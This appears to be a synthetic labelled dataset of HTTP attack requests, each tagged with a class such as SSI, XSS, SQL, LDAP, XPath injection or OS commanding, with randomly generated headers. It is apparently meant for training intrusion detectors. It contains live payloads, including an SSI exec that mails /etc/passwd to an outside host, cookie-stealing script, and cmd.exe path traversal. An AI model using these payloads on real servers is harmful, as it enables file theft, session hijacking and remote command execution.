Authorization: NTLM dHRubm90ZXVlbmtpbG9ibnV0am1oY3JtZW1vOE9hZW5yYWhucnJza25hZzhldGZs
Range: -3,456-488022
Referer: /0iSdp/EsIrdx/hdcoXa/0olNdcp.zip
TE: gzip
Trailer: Referer
User-Agent: Mozilla/3.1 (compatible; MSIE 1.5; Open BSD i386; 4ceiHaoe)
UA-CPU: StrongARM
UA-Disp: 4629,539,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 213x015
Via: HTTP/6.2 132.67.255.88, 9.1 1.92.143.201, HTTP/4.9 www.Lacsyi.js:68008
Transfer-Encoding: compress
Upgrade: ud4hrt/2.8, ifephn/3.0, adtIIr/9.5, oHsuT3/8.9
Warning: 335 www.pAcueaen.jpg "dsav8ecoO" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 888948293
----: ---------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45108
Start - Id: 39217
class: SSI
GET /6mQUAUH/byJPhE9JDEnGtIiF3k/hH7aKs9Y3hNGx6/rkSxm51R0hn/2XTuKnN-N/oHQ_Uop/s16CM-AAdThDj-j/s3lrrgio/ehmywtemoasnBCesr/QOBHumBlog.php3?iln=Newinnt&08I.5mvselect4l=-hd&Lig0iceeE=%3C%21--%23email+fromhost%3D%22www.9m3irnm.com%22+tohost%3D%22mailbox.xnai.com%22+message%3D%22eyet+oIaelu+uynte+rnn9ht%22+fromaddress%3D%22brrmee.com%22+toaddress%3D%22raN.pr.com%22+subject%3D%22o%22+sender%3D%22rl.com%22+replyto%3D%22l8AeS.com%22+cc%3D%22uud%22+inreplyto%3D%22hsr+fBsn+tpitTa%22+id%3D%22ehebmail%22+--%3E&t1SwRKYTU=Wnl5y&jdbrcee93gs=e7k&objectZAt8Vlivmt=7873877086&8cirtnoleeett=bigiIyeoebaaurttIh&9lcr5a3hs=s HTTP/1.1
Host: www.10et.de
Connection: close
Accept: */*
Accept-Charset: iso-2022-kr;q=0.9, windows-1252;q=0.9, windows-1252;q=0.6
Accept-Encoding: gzip
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 24.82.201.85
Cookie2: $Version="9"
Date: Thu, 10 Jun 04 24:38:50 CET
ETag: "stS0mrsBNpQBIdeOv"
From: eobt@sitnTmdv.ch
If-Modified-Since: Fri, 27 Oct 06 04:44:51 GMT
If-Unmodified-Since: Fri, 04 Jan 08 05:59:44 CET
If-Match: "8y6XS3TIQqZxkyoSF-"
If-None-Match: *
If-Range: Wed, 07 May 08 13:51:51 GMT
Max-Forwards: 2
Authorization: Basic b0RucWg6Y2F0WXB0a3c=
Range: 5962-
Referer: /tfnalf/t0ne.tar
User-Agent: Mozilla/3.5 (compatible; MSIE 7.0; Solaris; iOoa; iucx0o)
UA-Disp: 7987,886,16
UA-OS: Windows NT
UA-Color: color32
Via: 5.7 www.tfonaMw.css:441, 0.2 www.mtexl.shtml, HTTP/1.8 134.78.58.99
Transfer-Encoding: identity
Upgrade: etvee/9.3, tcp7s/3.5, trta/7.7, hrfcrn/6.4
Warning: 988 51.40.12.35 "rctnf7iObtnydwbkia" "Sat, 31 Dec 05 16:12:13 GMT"
----: -------------------------------

null

End - Id: 39217
Start - Id: 46554
class: XSS
GET cgiwrap/<SCRIPT>alert(document.domain)</SCRIPT>? HTTP/1.0
Host: 137.114.97.190
Connection: atht2cll
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 249.247.50.249
Cookie: lsdBHIvY49n.=7Z.H;Ux1evalT8=u/;Ise=0c7;rot=+h6;anela=ostyle/ suinsert6execenbat;ew=e@aL\ts80d4dii0e
Cookie2: $Version="6"
Date: Sat, 17 Feb 07 06:43:17 CET
ETag: "pxEyZUXsotp0fFplc7L_"
Expect: rltlnel=sLnE
From: ns7rogjc@npah.it
If-Modified-Since: Tue, 25 Aug 09 03:59:34 CET
If-Unmodified-Since: Mon, 04 Jan 10 10:12:41 CET
If-Match: "LyY44@DxncEFj_Cohm.i"
If-None-Match: *
If-Range: *
Max-Forwards: 634
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Digest username="rgww0see"
Authorization: Basic bGEydG9TNHQ6c2VuaWls
Range: 2794-2,-4107
Referer: http://www.pitr.fr/eh7ndee.mp3
TE: trailers,chunked;q=0.9,gzip
Trailer: Pragma
User-Agent: cw5tb/0.6.3.3
UA-CPU: 68000
UA-Disp: 884,253,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 139x000
Via: HTTP/7.5 200.196.202.38, 8.2 www.nrfluseq.shtml, FTP/6.8 217.194.10.27
Transfer-Encoding: identity
Upgrade: irra/6.5, aec/6.4, reai65/1.7, rTN/8.4, fctm/6.2
Warning: 953 162.158.190.142 "tshTYs" 
X-Forwarded-For: 45.4.150.153
X-Serial-Number: 907134703793407479
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46554
Start - Id: 49374
class: XPathInjection
GET /beRh8Noli/oieihi2s/access_log34G1.CQI6xmld/execed9VWcdv3/dcq7kxhGhZj/a5xzzPU_@BOpole/8eair/QMYphpD2u4H3V/rirr9irshsW/an0/7mOB.6u1y5dAKyU3I4Y/od3suc6nanq.mdb?VQWzKbscvYWl=008663&wXDIwindow.openKrmq7=h&JlHxp_@xfXm=rprem%27++++or++++fx%2Fhi%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D987%5D++++or+++++%27Nf%27++++%3D+%27 HTTP/1.0
Host: www.0alefn1.uk
Connection: ru9i
Accept: text/*
Accept-Charset: us-ascii;q=0.2, macintosh;q=0.5, euc-tw;q=0.2, x-mac-chinesetrad;q=0.3
Accept-Encoding: *;q=0.4
Accept-Language: aw-stsoe;q=0.9
Cache-Control: max-stale
Client-ip: 23.61.51.54
Cookie: vT12=eao;1rdmihelR=skUtfOcTg
Cookie2: $Version="951"
Date: Wed, 24 Aug 05 21:27:24 GMT
ETag: "8EMWsrpgGBvHJnZ9p9om"
Expect: mty5e=eh9oea;ie4est=etebu
From: hzioi@etsrec.cz
If-Modified-Since: Fri, 06 Oct 06 12:11:39 UTC
If-Unmodified-Since: Mon, 09 Jan 06 13:31:59 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 07 Jul 05 18:15:28 CET
Max-Forwards: 38
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://efar.be/thtuh/euhhew3a/theOa.conf
Authorization: NTLM ZXNlZmRldHNzaXd3bDBFMm1yN2VlbmZueXllaXNjbmlsaQ==
Range: 79-,-25900
Referer: /m1sTagro.shtml
TE: chunked
Trailer: Pragma
User-Agent: Mozilla/8.0 (Machintosh; U; PPC 6.5; tv-su; rv:1.2.0) Gecko/67269854
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0695x2392
Via: 6.9 www.fp7naYe.png, FTP/6.3 www.nrviim.html, pike/0.2 95.107.182.137:68
Transfer-Encoding: identity
Upgrade: peor/1.1, d2rrnr/4.2
Warning: 392 www.dbtno.css:44727 "hesiano" "Sat, 28 Jan 06 05:38:19 UTC"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49374
Start - Id: 40201
class: SSI
GET /Taci/o7dFZxXnDOySX.F9D9Gz/i8NMqUOtB-8N/AWG_.KshutdownFW3dLiI/bl/6IhttpaJuZ-Yochild@qE/tjayCX2mbBfuwyh/6xKB/fXAQdzNcMAwG/litoj/l41odsoees/njejgaemaBtkaenlZehm.sh?sfaFe6a=%3C%21--+++++%23exec++++cmd%3D%22%2Fbin%2Fmail+++++riinetb4.com+%3C++++%2Fetc%2Fpasswd%22--%3E HTTP/1.1
Host: www.lr9e1odfa.biz:676
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: oh5ai9-hi7d;q=0.1, nprp-oAbs;q=0.8
Cache-Control: only-if-cached
Client-ip: 206.250.78.157
Cookie2: $Version="808"
Date: Mon, 27 Mar 06 04:54:04 UTC
ETag: "h6GFeI6Xpx0R31tNI"
If-Modified-Since: Sat, 12 Dec 09 24:02:42 UTC
If-Unmodified-Since: Sun, 22 Oct 06 17:56:36 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 04 Dec 09 22:06:42 CET
Max-Forwards: 75
Proxy-Authorization: Basic M2l0bzplYXNo
Authorization: Digest algorithm=eb2rrtle
Referer: http://www.wnstynVy.gov/632qalQg/eabthtd/T0e1/sfm1/oshht.js
User-Agent: Mozilla/3.7 (Windows; U; Win98 4.2; td-ee; rv:1.5.0) Gecko/42350527
UA-Disp: 9617,113,16
UA-Pixels: 3172x5893
Via: 0.5 111.37.36.166, 0.8 181.21.105.196
Transfer-Encoding: deflate
----: -------------------------------

null

End - Id: 40201
Start - Id: 48224
class: XSS
POST /u5zitlxmn7ool/jVC8urbVDHkIO/5wFm3Nqm1v1uzp2q1PE1/w1CnNG.tbwtOlUxD3/g2.3/-AlK7YkQWGgUSE/9lLd9B67E/lpzi2f.exe? HTTP/1.0
Content-Length: 208
Content-Language: sneiDtu
Content-Encoding: deflate
Content-Location: /h1meyi/tEpfhteg/faib1ni/rbTDr/wshor1.exe
Content-MD5: cjNsYWxjc2R0bnNyZ3NiMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 13 Dec 06 23:16:43 GMT
Last-Modified: Tue, 09 Mar 10 11:48:16 UTC
Host: www.beof1oVq.it
Connection: close
Accept: text/*, video/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 250.110.180.51
Cookie: ediiu4seate=[\xC0][\xBC]script >[window.open('http://120.157.65.183/anat.exe'+document.cookie);][\xC0][\xBC]/script   >;ei2t=rlp;lynnaob=punionr&8$a6rca-eEae=;tlkoSi9=<edelete
Cookie2: $Version="97"
Date: Sat, 17 Sep 05 05:28:30 UTC
ETag: "fiYUZdx@4HsTyLbVQ"
If-Range: *
Max-Forwards: 5364
Referer: http://mseEidEm.it/wyigrr/hajdoa/outorh.pl
User-Agent: Mozilla/1.9 (Machintosh; U; Mac OS X 1.4; us-ul; rv:3.5.4) Gecko/95240684
UA-Pixels: 9186x045
Via: HTTP/4.2 133.87.255.116
Transfer-Encoding: gzip
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hyiEi3s5tiind=wnmQy&ad=9401531108&te=lYmYTskS5O&-YTKO1V_W=408404&rdc0eg= agll8t]Oeshheha )&inaEfWe=x8ogoe]tboot.inieecovard&xinD6BY=51577&5zo0cseasecletq=%logIr\pmovmt<&mhbFn=vbscriptsn6 iielexmle

End - Id: 48224
Start - Id: 37717
class: LdapInjection
POST /puWdDu.SxZT0p/hhxTtfkviSmKw/sEW0Fbx5WjDUL5/ssotu7zts36Cos/d9fPA.D3v/qAfKE/6dvux5zlLy/gg8haniy5mTb9oeesaET.jpg? HTTP/1.1
Content-Length: 153
Content-Language: orIaa,eepi
Content-Encoding: identity
Content-Location: /obkTI/iosr0teN/seeanoa8/hae6.asmx
Content-MD5: dWVhYVdpd3Nyb01sbmRycg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 25 Jan 05 06:43:18 UTC
Last-Modified: Wed, 07 Feb 07 21:36:38 CET
Host: www.nedpiie.st:6930
Connection: LOs0
Accept: */*
Accept-Charset: x-mac-cyrillic
Accept-Encoding: 
Accept-Language: ik-trw;q=0.5, 2-drt;q=0.0, Aetea-1E, ln-7rea, 9sheayt-0apn;q=0.0
Cache-Control: no-transform
Client-ip: 221.29.121.34
Cookie: eadthfm=525;woNfOilt=5177;oaufsrqawecO=6Fmdh@;haloy4onerlnt=elles7uta e;etnejek=oevrvnsreuh;iumSso6uEn=m
Cookie2: $Version="9"
Date: Sat, 23 Feb 08 17:21:36 GMT
ETag: W/"Cs9xygawlnPcuJ3Z1I"
Expect: 100-continue
From: pTja@hlne.com
If-Modified-Since: Wed, 25 Oct 06 05:51:16 UTC
If-Unmodified-Since: Sun, 03 Feb 08 04:57:47 GMT
If-Match: "gYAAsNsvRjUtupT"
If-None-Match: *
If-Range: Sat, 11 Oct 08 09:40:41 CET
Max-Forwards: 551
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM U2VhdWVyZUFuc21laG5pZWFwMXd5aGVleWNvY3JhQWVlbWxTdA==
Referer: /deabrae.mpg
TE: gzip
Trailer: Authorization
User-Agent: 7wwa6uwe
UA-CPU: MIPS
UA-Disp: 2046,4023,32
UA-Color: color16
UA-Pixels: 8766x859
Via: ali6l/5.9 226.192.75.177, FTP/4.7 www.ue5ag.gif
Transfer-Encoding: compress
Upgrade: beagd/0.0, 8at/9.9, elr/1.5, luY/7.5
X-Forwarded-For: 34.122.30.225
X-Serial-Number: 053115321
~~~~~: ~~~~~~~~~~~

Zen6mmtao7rnvH6=18839&e9Se0=rceonIodt&boot.ini3YzOxrcat=)  (  |   (    cn=*o'brien*)(mail  =*o  'brien* )&cokEnetwysndS=drservicesm

End - Id: 37717
Start - Id: 44188
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.ocOors.it:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesesimp, iso-8859-6
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: min-fresh=61
Client-ip: 241.231.162.21
Cookie: o2mo=formF;xjpemaasxmovo=14399360;webspedsg=421973
Cookie2: $Version="1"
Date: Mon, 03 Apr 06 16:09:40 UTC
ETag: "v0U9uAwSq_0imKTW"
Expect: tndt=le3s;e8nEso=Izpi
From: gozi@ydNwdaf.st
If-Modified-Since: Wed, 29 Aug 07 24:56:10 UTC
If-Unmodified-Since: Wed, 07 Jan 04 03:20:55 GMT
If-Match: *
If-None-Match: ".kTQU1l@3gRY6mN"
If-Range: Thu, 30 Dec 04 04:25:15 GMT
Max-Forwards: 7485
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: cDaurr ereutyh=ddc7ens
Range: 22399-
Referer: http://rnbutnso.cz/aiEep.jsp
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/6.4 (compatible; MSIE 2.2; SunOS sun4u; aaEe0; uaefT; ezu1seTa)
UA-CPU: PowerPC
UA-Disp: 054,707,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 389x154
Via: 8.5 www.2mraoMi.js, HTTP/4.0 7.123.118.193
Transfer-Encoding: eAmxit; odrefjs=teehA
Upgrade: daad/0.7, ule/2.7
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 81.148.120.241
X-Serial-Number: 77570647240448229537
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44188
Start - Id: 37871
class: LdapInjection
GET /uxJBr8wwBzXYIMD/huFB.LSGB/6X5/o7e0vawtleciGauen/u3TOXKLAUk0P4TO8g/rXxrdBY@Jg6/aE1dL8My-y0u.K.mspx?b0enthy=%29++++%28++++%7C+%28+cn%3D*o++%27brien*++%29%28mail+%3D*o+%27brien*+%29++&SwPaw=uyisaefhl2lsn&jreunrmo=rponrtasSa HTTP/1.1
Host: 92.25.101.237
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 243.107.176.204
Cookie: 6c=78;5b1ngchnekpeos=il:adminy|i8gsee0 insert
Cookie2: $Version="0"
Date: Tue, 16 Nov 04 20:41:22 UTC
ETag: W/"pzr-MWT_QI7QEla-I"
Expect: 100-continue
From: dxmog@eeOtwtfr.com
If-Modified-Since: Sat, 26 May 07 01:43:39 CET
If-Unmodified-Since: Thu, 15 Oct 09 05:52:44 CET
If-Match: "Gt_PXfIkfsT1hhe"
If-None-Match: "M9sH0o2P18l28ICX"
If-Range: *
Max-Forwards: 1743
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Atfeo UKet=rucegw
Authorization: mHrk sGamdg=QmliIol
Range: 89-,46-035533,8-609
Referer: /eaptt/iormxaT/8Gte.nsf
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: aot9iat1eed
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: 1.5 www.er7hy.htm:2968, 9.2 www.s3Imvns.jpeg
Transfer-Encoding: compress
Upgrade: obsm/5.8, 9ryw/0.8, Scti3/4.8
Warning: 215 158.37.64.80 "gyEeX5SasatlmkOT" "Sat, 08 May 04 12:37:49 UTC"
X-Forwarded-For: 32.94.96.206
X-Serial-Number: 300384
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 37871
Start - Id: 43771
class: OsCommanding
GET ..��...��..��..��..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.2hv7tnios.ch
Connection: close
Accept: */*;q=0.2
Accept-Charset: isiri-3342;q=0.4, windows-1252
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: min-fresh=6
Client-ip: 111.17.94.212
Cookie: teJTos=yauhhtonoeatrcpar;0eanfeqeIedna4=213517;9uoo=01069;ten=ni5LimTereed617sek
Cookie2: $Version="937"
Date: Tue, 22 Nov 05 21:36:48 UTC
ETag: "jz@gJWZ7STu9UBH8J@"
Expect: 100-continue
From: nrfbhece@hbiiwgu.org
If-Modified-Since: Fri, 01 Oct 04 14:37:20 CET
If-Unmodified-Since: Tue, 04 Mar 08 24:51:01 UTC
If-Match: "TA5Ul3_kyVRwbqsEZBPT"
If-None-Match: "R.4YXUB1gPoIsWqJ4"
If-Range: Tue, 17 Jan 06 06:36:27 GMT
Max-Forwards: 4
MIME-Version: 7.5
Pragma: reet=aek
Proxy-Authorization: Digest opaque="leSssie"
Authorization: uere agvIeAy=elieh2e
Range: 10571-03
Referer: /Oucu4gu/euaniW/hi1ttCa/atigaee/7eihrsas.pl
TE: chunked;q=0.7,trailers
Trailer: From
User-Agent: Mozilla/3.5 (Windows; U; Windows NT 6.0; zq-Lu; rv:8.4.8) Gecko/99329169
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 757x0361
Via: 9.1 www.edbtsoN.jpg
Transfer-Encoding: iovfod; oustwbe=qNORAam
Upgrade: o9h5r/6.8, 6Ah/8.0, nazl/9.6, 2Odwz/0.1, cfaEl/6.1
Warning: 658 www.Hscsmktn.js:3 "stszn923barrtxs" "Thu, 16 Oct 08 07:29:39 UTC"
X-Forwarded-For: 85.158.30.227
X-Serial-Number: 026026261334603
----: ----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43771
Start - Id: 44106
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 47.230.104.126
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: deflate, identity, gzip, gzip;q=0.6
Accept-Language: reiS-muCahfTb, oisin-ecL;q=0.7, hct5MO-Khk;q=0.1, eo-nedrsCau;q=0.7, r-tNnqWN4;q=0.1
Cache-Control: no-cache
Client-ip: 212.7.68.146
Cookie: upr9nlhjo=101;s6=eCa%
Cookie2: $Version="7"
Date: Tue, 23 Oct 07 04:46:00 GMT
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: nvabn6ks@5obcxtres.uk
If-Modified-Since: Thu, 18 May 06 16:15:29 GMT
If-Unmodified-Since: Thu, 27 Jan 05 01:37:53 UTC
If-Match: "Uv1ZNf812leJATaD"
If-None-Match: *
If-Range: *
Max-Forwards: 1568
MIME-Version: 4.3
Pragma: cn=aLwhuimn
Proxy-Authorization: NTLM YTlha3RlZjlua29weWVzb2s3MW5yemFoMm5wbk4waVJzZW9ndG4zTGhpOGh0aQ==
Authorization: NTLM aGN6aTVpd3RycnFzdGJvaHN0MnVqc2xpZ25hYWVkZm9saw==
Range: 70-
Referer: /nv77uyct/ybleEs/heht/lnetiaoi.dll
TE: deflate
Trailer: Date
User-Agent: Mozilla/9.3 (compatible; Konqueror/0.2; Linux i586; bnmAetoc; lyrl7eint; anez5iHo)
UA-CPU: x86
UA-Disp: 224,424,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1501x189
Via: 5.3 201.253.147.38, hGpre/8.3 207.50.65.250
Transfer-Encoding: gzip
Upgrade: 8sjta/1.7, OaiEm/9.0
Warning: 552 www.5qeog.tiff "0tt4tuzwrsgn" 
X-Forwarded-For: 194.144.61.158
X-Serial-Number: 008751
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44106
Start - Id: 42332
class: SqlInjection
GET /h6-a0Il2Fu/o2Iqo1Ur/nernoB2tse6o1En/vm1stnvoijdfe/tII7EO5nFOl/K0AY-/oKH1R/4S5BMcEstrJkc/rlIyawe/cELLhwZoP-ZsTU/i8eyt.asp?deenheaiaeynse=mlatCio+8hh%3Dtf%5B&air1ryythhao7e=0aite&myeasoYeyoieef=rhaHmnaO0vxcs&5bos=o6xwoeotYsFi&egeah=oF%40GS&tTE08=%27tmpss&eiinTonhhz2eoat=t&eaAho=%27++%2B++%28++SELECT++++TOP+1++3hiyjo+++++FROM++++M4haenr%29+++%2B+++++%27&JH68mocha@QP=576952&Eoo5gtin6tti3j=bgsoundiimge%7C&balt=%26nmumas27%25s&srKcselt4imt6=eCv-m9J&tpmeg6u1bysytyi=ibenph-tee HTTP/1.0
Host: www.hO6nv.de
Connection: keep-alive
Accept: text/html;q=0.4, application/x-tar;q=0.2
Accept-Charset: iso-8859-3;q=0.6, iso-8859-1;q=0.2, iso-8859-5, windows-874;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=9413
Client-ip: 59.166.67.8
Cookie: qr8UjtttTsaj=jm1;9idgohevc=?r7alk;rsshoo=|msnsamsDt;M3VZyBGF=rr;y6oieroele=10;hennoedbrm=irtopenhoneo s0
Cookie2: $Version="653"
Date: Wed, 08 Jul 09 15:22:51 CET
ETag: "_05h89GLjeFPIMmU"
Expect: tSrqeree=81oy1B
From: dtce1iim@oe8uountoe.de
If-Modified-Since: Wed, 23 Sep 09 02:10:13 CET
If-Unmodified-Since: Sun, 27 May 07 11:51:22 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 08 Nov 07 07:17:15 UTC
Max-Forwards: 256
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Basic ZWRhdzpsb2dFaA==
Range: -416,3-,-523324
Referer: http://hentefu.it/7eeee.png
TE: trailers,gzip
Trailer: User-Agent
User-Agent: Mozilla/0.4 (Machintosh; U; PPC Mac OS X 3.0; Ea-y8; rv:9.5.3) Gecko/01904024
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4371x6437
Via: 6.3 132.184.136.215, HTTP/4.6 www.fiRd.shtml:25456, 5.8 www.Erihdzo.png
Transfer-Encoding: ipvwE
Upgrade: a7a59/7.5, fns/4.8, 3c9id/4.9
Warning: 797 57.31.42.175 "ddh8os78iba" "Mon, 22 Aug 05 11:07:24 UTC"
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 73535
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42332
Start - Id: 39884
class: SSI
GET /wFT/uTmJeLpaDuIF..Xsbr_T/ko0lBftte23ock3Pvj/ysWUOzqCNr2CFWcN@f/s1i2wH6/h-B/ooqp.jpeg?cokEondesePe=aascriptno&s0wie=522&EkfCnull=5441880&jt=meps%24ra%3Drfs%5Ben HTTP/1.1
Host: 13.27.160.44
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-japanese;q=0.8, windows-1254;q=0.8, windows-874, x-mac-arabic;q=0.0, iso-8859-4
Accept-Encoding: gzip
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 190.48.45.60
Cookie: tahj=4706166;sA0bi=<!-- #exec cmd="/bin/ls     -l /home/clEnoi/wstHItaEin"     -->;sLh4=iQcMBqZ;vFcOxPaoMto=rtn -5ea87[ag  sin;TLein87aCdnyu=03134113;au=XnOevalDlsc9u
Cookie2: $Version="8"
Date: Tue, 25 Apr 06 07:41:16 GMT
ETag: W/"i84vEI5jLCJw4wnxu0qy"
Expect: 100-continue
From: nLbcjwh1@egond.st
If-Modified-Since: Mon, 27 Jul 09 21:14:10 UTC
If-Unmodified-Since: Mon, 28 Sep 09 18:55:21 UTC
If-Match: "wlbKG.ljW3tZn24.@hA4"
If-None-Match: "02VflB_E.BSdSs3"
If-Range: *
Max-Forwards: 6
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: htAfoe Nnews=uqske3p
Authorization: NTLM aXNydGVyaW5VMG10dFRPcmhkZTl0cmhlZXRveGxvZHNkaWx0bA==
Range: -8,914957-7949,1729-07
Referer: /gnAeTT/p8yh.asmx
TE: chunked,trailers
Trailer: Proxy-Authorization
User-Agent: yiblgear (y0tu2tov)
UA-OS: Solaris
Via: HTTP/0.9 www.nshBdimq.gif, 2.6 www.luebS5rm.tiff
Transfer-Encoding: sewnz; iiruw9n=ilhoth
Warning: 521 25.117.247.10 "eele" 
X-Forwarded-For: 159.138.226.2
X-Serial-Number: 54810221590
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39884
Start - Id: 41722
class: SqlInjection
GET /KV.Z/nJ/iqHu4waW.asp?acsNnae=%27++++OR++%27%27++%3D%27&thits8osr=6634612 HTTP/1.1
Host: www.fx8taoa.st
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: compress;q=0.5, gzip, gzip;q=0.7, gzip, identity
Accept-Language: *;q=0.4
Cache-Control: max-age=9981
Client-ip: 118.213.186.63
Cookie: StonatoiU=8160980;tlim=ecmdtes7;oEo4l0=ht;mwn=153531671;eoiaL8ca=ad95mQLzeDnF
Cookie2: $Version="483"
Date: Tue, 21 Aug 07 04:30:00 CET
ETag: W/"mBchHL7aQtkPkmSctxou"
Expect: 100-continue
From: w8p8dsn@ib8roeax.cz
If-Modified-Since: Wed, 17 Mar 10 14:41:22 GMT
If-Unmodified-Since: Thu, 19 Jun 08 21:04:19 GMT
If-Match: *
If-None-Match: "GXrGnNJe9dDO4fka"
If-Range: *
Max-Forwards: 422
MIME-Version: 9.0
Pragma: en=3
Proxy-Authorization: Basic cnF5cmFkbWk6N2kzM2Q=
Authorization: NTLM bW50UHNhdHdybm5uZXJFYXN2d2lsZWlvYm12cmlsdHRUdGZ0YQ==
Range: -08
Referer: http://www.ya8eo.net/imjonw5/nuosnr/haaSr0hc/atHOsse/a1x7w.pl
TE: trailers,chunked;q=0.8
Trailer: Via
User-Agent: Mozilla/5.0 (compatible; sesayS7; Unix; dcymqdo; 2tiyin6)
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 431x0868
Via: FTP/1.4 57.123.195.248
Transfer-Encoding: compress
Upgrade: aah/4.0
Warning: 132 www.gls0.js "sseahcsnj2f1dtnEm93r" 
X-Forwarded-For: 152.105.208.9
X-Serial-Number: 611965021882313
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41722
Start - Id: 49107
class: XPathInjection
GET /ils66c6odatj/_AshutdownS9/peOhVFAg/sfg.o3gLyjNxD7pAbn6J/t4ledeAySEsS5eotf/4HroAtrcvRe/unNHa-MqRPg1iR9G/7e8wqihtl8eyYgsee6ni/h5K.U6QlfsQNfPGzPH/qrrezsQdmyDadl/1updatetPRBbvservices.pl?i6teh=enla&aus8neltEn9i=38527&lt1ld3l=twre9&1IuaeholMesrTsy=s9EIw7LI&vleksJs=934070&ap8Gtjatezr0ef=ops+h&UK.tmp2SdstdinW3e=%3Ahoimgwtst0w&acrwfmnlat=Aoc&eSn6rlnneOoot=7040&a8r=h+p&paiy8=rhwednEp%27+or+++count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28++i%2Bj++++%2B+k+%2B+++l%2B+++1%29%5D+++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or++%27tfsi%27%3D+%27+isl%27+++or HTTP/1.0
Host: 197.182.7.45
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, identity, compress;q=0.5, deflate;q=0.0
Accept-Language: *;q=0.9
Cache-Control: ephrtr='dott'
Client-ip: 28.123.132.190
Cookie: kdhWtUZ=gengcnnkiht;sd=537461666;tbwesdanaduviN=0368;ytaoe9=5;0C2t_7id=2u1B;o2ncNwindow.openE=422
Cookie2: $Version="48"
Date: Fri, 06 Oct 06 13:54:32 UTC
ETag: "aJP_ykVHbIdAGXuNdz"
Expect: 100-continue
From: o1Nf5@ocset.it
If-Modified-Since: Mon, 14 Feb 05 08:13:39 GMT
If-Unmodified-Since: Mon, 01 Feb 10 12:40:14 UTC
If-Match: "xOdDzZBstjtmPsNj"
If-None-Match: *
